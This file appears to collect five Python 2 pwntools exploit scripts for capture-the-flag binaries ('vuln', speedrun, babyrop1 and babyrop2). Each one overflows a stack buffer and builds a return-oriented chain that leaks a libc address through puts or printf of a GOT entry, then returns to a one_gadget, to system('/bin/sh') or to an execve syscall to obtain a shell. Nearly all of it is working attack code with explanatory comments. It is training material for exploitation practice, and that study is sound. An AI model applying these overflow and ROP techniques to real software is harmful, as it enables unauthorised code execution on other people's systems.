exploit.py


from pwn import *


# Driver for the local 32-bit challenge binary "./vuln".  Written for
# Python 2 era pwntools: payloads are built as str and concatenated with
# p32() output (under Python 3 pwntools p32() returns bytes, so this mix
# would raise TypeError).
p = process("./vuln")



# The binary, and the libc that pwntools associates with the spawned
# process; every libc offset used below is only valid for that exact build.
e = ELF("./vuln")

l = e.libc



# Menu choice sent before the overflowing input; what option 3 does is not
# visible in this script.
p.sendlineafter(">>","3")



# Hard-coded addresses from the challenge binary (non-PIE, judging by the
# absolute values).  "pr" is presumably a pop/ret gadget that drops one
# stack slot; "restart" is the address returned to after the leak so the
# overflowing read can be reached a second time -- confirm both in the binary.
pr = 0x0804884b

restart = 0x80486E0


# Round 1: 0x40 bytes of buffer plus 4 bytes (the saved frame pointer,
# inferred from the constant), then the return address is overwritten with:
#   puts@plt  <- return address: call puts
#   pr        <- puts' own return address (pops the argument slot, returns)
#   puts@got  <- puts' argument: the GOT slot holding libc's puts address
#   restart   <- where pr returns to
payload = "A"*(0x40+4)

payload += p32(e.plt['puts'])  

payload += p32(pr)

payload += p32(e.got['puts'])

payload += p32(restart)



p.sendlineafter("plz!\n",payload)

# Skip the program's farewell text; the next 4 bytes are what puts() wrote
# from the GOT slot, i.e. libc's puts address in little-endian form.
p.recvuntil("Good bye~~!\n")

puts_addr = u32(p.recv(4))

libc_base = puts_addr - l.symbols['puts']
# Candidate one_gadget offsets for this libc build; only index 0 is used
# (index 1 is a duplicate of it).  Whether the gadget's preconditions hold
# at the time of the jump is not checked here.
one_gadget = [0x3d0d5,0x3d0d5,0x3d0d9,0x3d0e0,0x67a7f,0x67a80,0x137e5e,0x137e5f]
one_addr = libc_base + one_gadget[0]

# Round 2: the same overflow, returning straight to the computed gadget.
payload2 = "A"*(0x40+4)
payload2 += p32(one_addr)
p.sendlineafter("plz",payload2)
p.interactive()



speedrun1_exploit.py


from pwn import *


# Driver for the local 64-bit challenge binary "./vuln" (Speedrun 1).
# Python 2 era pwntools: str payloads concatenated with p64() output
# (TypeError under Python 3 pwntools, where p64() returns bytes).
p = process("./vuln")

e = ELF('./vuln')


# Hard-coded gadget addresses from the binary, named for what they are
# presumed to do (pop into the named register, then ret; "syscall" is a
# syscall instruction).  None of this is verified here -- confirm against
# the binary.
syscall = 0x474e65

pop_eax = 0x415664

pop_rdi = 0x400686

pop_rsi = 0x4101f3

pop_rdx = 0x4498b5

# NUL-terminated program path; the first syscall in the chain reads it
# into .bss, the second executes it.
binsh = "/bin/sh\x00"



# 0x400 bytes of buffer plus 8 bytes for the saved frame pointer (inferred
# from the layout); everything after that overwrites the return address.
payload = "A"*0x400 

payload += "B"*8

# Chain part 1: read(0, e.bss(), len(binsh)) -- rax=0 is the x86-64 read
# syscall number.  The bytes come from the process's stdin, i.e. the
# p.send(binsh) further down.
payload += p64(pop_eax) 

payload += p64(0)

payload += p64(pop_rdi)

payload += p64(0)

payload += p64(pop_rsi)

payload += p64(e.bss())

payload += p64(pop_rdx)

payload += p64(len(binsh))

payload += p64(syscall)




# Chain part 2: execve(e.bss(), NULL, NULL) -- rax=59 is the x86-64 execve
# syscall number; rdi points at the string just read into .bss.
payload += p64(pop_eax)

payload += p64(59)

payload += p64(pop_rdi)

payload += p64(e.bss())

payload += p64(pop_rsi)

payload += p64(0)

payload += p64(pop_rdx)

payload += p64(0)

payload += p64(syscall)


p.sendlineafter("words?\n",payload)

# Fixed pause so the overflowing line is consumed before the second write
# lands.  A sleep is a race, not a synchronisation; if the two writes are
# merged into one read, the chain gets the wrong bytes.
sleep(0.1)

p.send(binsh)

p.interactive()



speedrun2_exploit.py


from pwn import *


# Driver for the local 64-bit "./vuln" (Speedrun 2).  Python 2 script: it
# uses the print statement and str payloads, so it is not valid Python 3.
p = process("./vuln")


e = ELF('./vuln')

# libc pwntools associates with the process; the offset below assumes
# exactly that build.
l = e.libc


# Fixed answer the program expects before it reads the overflowing input;
# the prompt/answer protocol is only visible through these strings.
p.sendlineafter("now?\n","Everything intelligent is so boring.")


# Hard-coded gadget, presumably pop rdi; ret given how it is used below
# (one value popped, then a call that expects its argument in rdi) -- confirm.
pr = 0x4008a3



# Round 1: 0x400 bytes of buffer + 8 bytes saved frame pointer (inferred
# from the constant), then:
#   pr         <- return address
#   puts@got   <- popped into the argument register
#   puts@plt   <- puts(GOT slot) prints libc's puts address
#   0x40074C   <- hard-coded address returned to afterwards, so the program
#                 repeats its prompt (see the second sendlineafter below)
payload = "A"*(0x400+8)

payload += p64(pr)

payload += p64(e.got['puts'])

payload += p64(e.plt['puts'])

payload += p64(0x40074C)



p.sendlineafter("more.\n",payload)

# Python 2 print statement, used only as a trace.  Consumes the reply up to
# and including "Fascinating.\n"; the leaked address follows it.
print p.recvuntil("Fascinating.\n")

# puts() stops at the first NUL byte; a user-space x86-64 address typically
# has two zero high bytes, so 6 bytes are read and zero-padded to 8 before
# unpacking.
puts_addr =  u64(p.recv(6).ljust(8,"\x00"))

libc_base = puts_addr - l.symbols['puts']

# Hard-coded one_gadget offset for this libc build; its preconditions are
# not checked here.
one_addr = libc_base + 0x10a38c


# Round 2: same answer, same overflow, return straight to the gadget.
p.sendlineafter("now?\n","Everything intelligent is so boring.")


payload2 = "A"*(0x400+8)

payload2 += p64(one_addr)


# sendlineafter returns the data received before the send; printed (Python 2
# print statement) only as a trace.
print p.sendlineafter("more.\n",payload2)

sleep(0.1)

p.interactive()



babyrop1_exploit.py


from pwn import *

  

# Driver for the local 64-bit "./babyrop1".  Python 2 era pwntools (str
# payloads concatenated with p64() output).
p = process("./babyrop1")


# Hard-coded addresses from the binary (non-PIE, judging by the absolute
# values).  Presumed meaning from their names and use -- confirm in the
# binary:
#   system  = system's PLT entry or a call site
#   binsh   = a "/bin/sh" string inside the binary's data
#   pr      = pop rdi; ret (one value popped into the first-argument register)
#   ret     = a lone ret, presumably inserted for stack alignment before
#             entering system
system = 0x400490

binsh = 0x601048

pr = 0x400683

ret = 0x400479


# 0x10 bytes of buffer + 8 bytes saved frame pointer (inferred), then the
# chain: pr pops binsh into rdi, ret is a no-op hop, system(rdi) is entered.
payload = "A"*(0x10+8)

payload += p64(pr)

payload += p64(binsh)

payload += p64(ret)

payload += p64(system)


p.sendlineafter("? ",payload)

p.interactive()



babyrop2_exploit.py


from pwn import *


# Driver for the local 64-bit "./babyrop2".  Python 2 era pwntools (str
# payloads concatenated with p64() output).  Two rounds: leak read()'s libc
# address through printf, then return into system("/bin/sh") computed from
# that libc.
p = process("./babyrop2")


e = ELF("./babyrop2")

# libc pwntools associates with the process; the symbol lookups below
# assume exactly that build.
l = e.libc


# Hard-coded gadgets from the binary -- presumably pop rdi; ret and a lone
# ret (alignment hop), judging by their use; confirm in the binary.
pr = 0x400733

ret = 0x4004d1

# Candidate one_gadget offsets.  NOTE: never used below -- the script goes
# through system instead.  Dead code.
one_gadget = [0x4f2c5,0x4f322,0x10a38c]


# Round 1: 0x20-byte buffer + 8 bytes saved frame pointer (inferred), then:
#   pr          <- return address
#   read@got    <- popped into rdi: printf's format-string argument is the
#                  GOT slot itself, so printf emits the raw address bytes
#   ret         <- alignment hop
#   printf@plt
#   ret
#   0x400636    <- hard-coded re-entry point so the prompt is shown again
payload = "A"*(0x20+8)

payload += p64(pr)

payload += p64(e.got["read"])

payload += p64(ret)

payload += p64(e.plt['printf'])

payload += p64(ret)

payload += p64(0x400636)


p.sendlineafter("? ",payload)

# printf stops at the first NUL byte, so 6 address bytes arrive; they are
# zero-padded to 8 before unpacking.
p.recvuntil("!\n")

read_addr =  u64(p.recv(6).ljust(8,"\x00"))

libc_base = read_addr - l.symbols['read']

system_addr = libc_base + l.symbols['system']

# First occurrence of "/bin/sh" in the libc image, rebased onto the leak.
binsh = libc_base + list(l.search("/bin/sh"))[0]


# Round 2: ret first (alignment hop), then pop binsh into rdi and enter
# system.
payload2 = "A"*(0x20+8)

payload2 += p64(ret)

payload2 += p64(pr)

payload2 += p64(binsh)

payload2 += p64(system_addr)

p.recvuntil("? ")

p.sendline(payload2)

p.interactive()

